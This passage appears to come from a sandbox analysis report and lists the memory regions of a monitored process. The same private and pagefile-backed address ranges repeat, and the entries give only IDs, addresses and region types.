0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13183 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13184 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13185 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13186 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13187 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13188 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13189 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13190 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13191 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13192 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13193 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13194 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13195 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13196 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13197 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13198 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13199 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13201 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13289 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13290 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13291 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13292 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13339 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13340 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13341 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13342 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13343 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13344 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13345 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13346 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13347 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13348 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13349 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13350 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13351 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13352 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13353 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13354 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13355 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13356 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13357 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13358 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13359 start_va = 0x580000 end_va = 0x582fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13360 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13361 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 13362 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13363 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13364 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13365 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13366 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13367 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13368 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13369 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13370 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13371 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13372 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13373 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13374 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13375 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13376 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13377 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13378 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13379 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13380 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13381 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13382 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13383 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13384 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13385 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13386 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13387 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13388 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13389 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13390 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13391 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13392 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13393 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13394 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13395 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13396 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13397 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13398 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13399 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13400 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13401 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13402 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13403 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13404 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13405 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13406 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13407 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13408 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13409 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13410 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13411 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13412 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13413 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13414 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13415 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13416 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13417 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13418 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13419 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13420 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13421 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13422 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13423 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13424 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13425 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13426 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13427 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13428 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13429 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13430 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13431 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13432 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13433 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13434 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13435 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13436 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13437 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13438 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13439 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13440 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13441 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13442 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13443 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13444 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13445 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13446 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13447 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13448 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13449 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13450 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13451 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13452 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13453 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13454 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13455 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13456 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13457 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13458 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13459 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13460 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13461 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13462 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13463 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13464 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13465 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13466 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13467 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13468 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13469 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13470 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13471 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13472 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13473 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13474 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13475 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13476 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13477 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13478 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13479 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13480 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13481 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13482 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13483 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13484 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13485 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13486 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13487 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13488 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13489 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13490 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13491 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13492 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13493 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13494 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13495 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13496 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13497 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13498 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13499 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13500 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13501 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13502 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13503 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13504 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13505 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13506 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13507 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13508 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13509 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13510 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13511 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13512 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13513 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13514 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" 